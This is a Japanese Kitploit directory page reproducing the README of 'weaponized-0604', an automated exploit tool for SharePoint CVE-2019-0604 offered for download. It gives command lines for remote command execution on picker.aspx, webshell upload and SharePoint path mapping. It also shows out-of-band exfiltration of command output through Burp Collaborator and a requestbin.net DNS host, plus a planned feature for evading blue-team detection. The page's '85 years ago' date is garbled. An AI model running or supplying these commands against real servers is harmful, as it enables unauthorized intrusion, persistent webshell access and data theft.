Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
weaponized-0604 — SharePoint CVE-2019-0604 をエクスプロイトするための自動化ツール | Kitploit
ツール/GitHubGitHub/gh0st0ne/weaponized-0604
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubgh0st0ne/weaponized-0604

weaponized-0604

SharePoint CVE-2019-0604 をエクスプロイトするための自動化ツール

リポジトリを見る
85年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

武器化された CVE-2019-0604

CVE-2019-0604 を最大限に活用する自動エクスプロイトツール。

要件

requirements.txt ファイルには、このツールが使用するすべての Python ライブラリを記載する必要があります。これらは以下を使用してインストールされます。

root@kitploit:~
$ pip install -r requirements.txt

手動ブラインドエクスプロイト(資格情報あり/なし)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

アップロード機能

任意のクールなもの(webshell、recon ツールなど)をアップロード

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

ディレクトリマッピング

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

OOB を使用してコマンド結果を取得する

collaborator_http_api Burp 拡張機能を使用する

  1. collaborator_http_api.py を BurpSuite (Pro) にインストールしますか?
  2. BurpSuite がこのエクスプロイトと同じマシンで実行されていることを確認します。
  3. 実行して、取得した出力をお楽しみください :)
root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

DNSLog(例: requestbin.net)を使用する

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

DNS からデータを取得

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

自分でデコードしてみてね :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

TODO

  • 引数パーサー
  • SharePoint、CVE-2019-0604
  • コマンドを複数の部分に分割する(args.cmds 内)
  • オンデマンドでバイナリを指定し、ブルーチームによる検出を回避する(現在は cmd.exe をハードコード)

著者

  • Tree
ツールをダウンロード